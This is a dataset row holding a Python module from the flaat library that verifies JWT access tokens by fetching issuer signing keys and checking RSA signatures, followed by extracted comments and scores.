jwks_uri = issuer.issuer_config.get("jwks_uri", "")
if jwks_uri == "":
raise FlaatUnauthenticated(
"Could not verify JWT: Issuer config has no jwks_uri"
)
jwk_client = FlaatPyJWKClient(jwks_uri)
signing_key = jwk_client.get_signing_key_from_jwt(access_token)
try:
complete_decode = jwt.api_jwt.decode_complete(
access_token,
signing_key.key,
algorithms=PERMITTED_SIGNATURE_ALGORITHMS,
options={"verify_aud": False},
)
except jwt.exceptions.PyJWTError as e:
raise FlaatUnauthenticated(f"Could not verify JWT: {e}") from e
return AccessTokenInfo(
complete_decode,
verification={"algorithm": complete_decode.get("header", {}).get("alg", "")},
)
| # This code is distributed under the MIT License
import base64
from dataclasses import dataclass
import logging
from typing import Optional, List
import jwt
from flaat.exceptions import FlaatUnauthenticated
from flaat.issuers import IssuerConfig
logger = logging.getLogger(__name__)
# Expand this list in a sensible way
PERMITTED_SIGNATURE_ALGORITHMS = [
"RS256",
"RS384",
"RS512",
]
def _base64_url_encode(data):
"""Decode base64 encode data"""
if not isinstance(data, bytes):
data = data.encode("utf-8")
encode = base64.urlsafe_b64encode(data)
return encode.decode("utf-8").rstrip("=")
@dataclass
class AccessTokenInfo:
"""Infos from a JWT access token"""
header: dict
""" The JWTs JOSE header """
body: dict
""" The JWTs data payload """
signature: str
""" The JWTs JWS signature """
verification: Optional[dict]
""" Infos about the verification of the JWT.
If set to `None`, then the JWT data is unverified."""
def __init__(self, complete_decode, verification=Optional[dict]):
self.header = complete_decode.get("header", {})
self.body = complete_decode.get("payload", {})
self.signature = _base64_url_encode(complete_decode.get("signature", b""))
self.verification = verification
@property
def issuer(self) -> str:
return self.body.get("iss", "")
class FlaatPyJWKClient(jwt.PyJWKClient):
"""Fixes the jwt.PyJWKClient class:
* get_signing_keys
* does not call self.get_jwk_set(), since it fails when "enc" keys are present
* returns only keys used for signing (e.g. filters out keys with "use" == "enc")
* get_signing_key_from_jwt
* tries to retrieve keys by id only if "kid" is specified in token header
* otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg")
* "alg" is always present in JWT header
* an additional method get_signing_key_by_alg
"""
def get_signing_keys(self) -> List[jwt.api_jwk.PyJWK]:
data = self.fetch_data()
# filter for signing keys, i.e. "use" in ["sig", None]
keys = [
key for key in data.get("keys", []) if key.get("use", None) in ["sig", None]
]
signing_keys = jwt.PyJWKSet(keys)
if not signing_keys:
raise jwt.exceptions.PyJWKClientError(
"The JWKS endpoint did not contain any signing keys"
)
return signing_keys.keys
def get_signing_key_by_alg(self, alg: str) -> jwt.api_jwk.PyJWK:
# algorithm is none, then signing key is None; signature must be empty octet string
if alg == "none":
return jwt.api_jwk.PyJWK({}, algorithm="none")
# infer key type from algorithm
key_type = ""
if alg.startswith("RS") or alg.startswith("PS"):
key_type = "RSA"
if alg.startswith("HS"):
key_type = "oct"
if alg.startswith("ES"):
key_type = "EC"
if alg.startswith("Ed"):
key_type = "OKP"
signing_keys = self.get_signing_keys()
signing_key = None
for key in signing_keys:
if key.key_type == key_type:
signing_key = key
break
if not signing_key:
raise jwt.exceptions.PyJWKClientError(
f'Unable to find a signing key that matches alg: "{alg}"'
)
return signing_key
def get_signing_key_from_jwt(self, token: str) -> jwt.api_jwk.PyJWK:
unverified = jwt.api_jwt.decode_complete(
token, options={"verify_signature": False}
)
header = unverified["header"]
kid = header.get("kid", None)
if kid:
return self.get_signing_key(kid)
# alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1
alg = header.get("alg", None)
if alg:
return self.get_signing_key_by_alg(alg)
raise FlaatUnauthenticated(
"Could not verify JWT: The token header did not contain an 'alg'."
)
def get_access_token_info(access_token, verify=True) -> Optional[AccessTokenInfo]:
unverified = {}
try:
unverified = jwt.api_jwt.decode_complete(
access_token,
options={
"verify_signature": False,
},
)
unverified_body = unverified.get("payload", {})
except jwt.DecodeError:
return None
if not verify:
return AccessTokenInfo(unverified, verification=None)
issuer = IssuerConfig.get_from_string(unverified_body.get("iss", ""))
if issuer is None:
raise FlaatUnauthenticated("Could not verify JWT: No 'iss' claim in body")
jwks_uri = issuer.issuer_config.get("jwks_uri", "")
if jwks_uri == "":
raise FlaatUnauthenticated(
"Could not verify JWT: Issuer config has no jwks_uri"
)
jwk_client = FlaatPyJWKClient(jwks_uri)
signing_key = jwk_client.get_signing_key_from_jwt(access_token)
try:
complete_decode = jwt.api_jwt.decode_complete(
access_token,
signing_key.key,
algorithms=PERMITTED_SIGNATURE_ALGORITHMS,
options={"verify_aud": False},
)
except jwt.exceptions.PyJWTError as e:
raise FlaatUnauthenticated(f"Could not verify JWT: {e}") from e
return AccessTokenInfo(
complete_decode,
verification={"algorithm": complete_decode.get("header", {}).get("alg", "")},
)
| en | 0.727378 | # This code is distributed under the MIT License # Expand this list in a sensible way Decode base64 encode data Infos from a JWT access token The JWTs JOSE header The JWTs data payload The JWTs JWS signature Infos about the verification of the JWT. If set to `None`, then the JWT data is unverified. Fixes the jwt.PyJWKClient class: * get_signing_keys * does not call self.get_jwk_set(), since it fails when "enc" keys are present * returns only keys used for signing (e.g. filters out keys with "use" == "enc") * get_signing_key_from_jwt * tries to retrieve keys by id only if "kid" is specified in token header * otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg") * "alg" is always present in JWT header * an additional method get_signing_key_by_alg # filter for signing keys, i.e. "use" in ["sig", None] # algorithm is none, then signing key is None; signature must be empty octet string # infer key type from algorithm # alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1 | 2.481725 | 2 |